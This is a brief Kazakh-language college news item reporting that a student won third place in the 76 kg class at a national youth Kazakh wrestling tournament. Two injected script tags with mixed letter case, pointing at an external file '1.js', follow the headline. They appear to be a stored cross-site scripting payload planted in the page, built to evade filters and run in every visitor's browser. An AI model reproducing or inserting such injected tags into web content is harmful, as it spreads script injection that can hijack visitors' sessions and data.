КОЛЛЕДЖ СТУДЕНТІ РЕСПУБЛИКАЛЫҚ ТУРНИРДЕ ЖҮЛДЕГЕР АТАНДЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
08.10.2021
Қазақстан Республикасы Тәуелсіздігінің 30 жылдығына орай Райымбек батырды еске алуға арналған қазақ күресінен жасөспірімдер арасында республикалық турнир өтті. Мұнда 300 спортшы бақ сынады. Сонау ықылым заманнан келе жатқан білекті азаматтар сайысатын спорт түріне Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің студенті Төлеухан Алмат қатысты. Ол – «Дене тәрбиесі және спорт» мамандығының ІІІ курс студенті. Алмат дүбірлі додада 76 келі салмақ дәрежесінде күресті. Бұл салмақ бойынша барлығы 20 палуан бақ сынады. Турнир қорытындысына сәйкес Төлеухан Алмат ІІІ орын иегері атанып, 70 мың теңгелік сертификатқа ие болды.
Просмотров: 450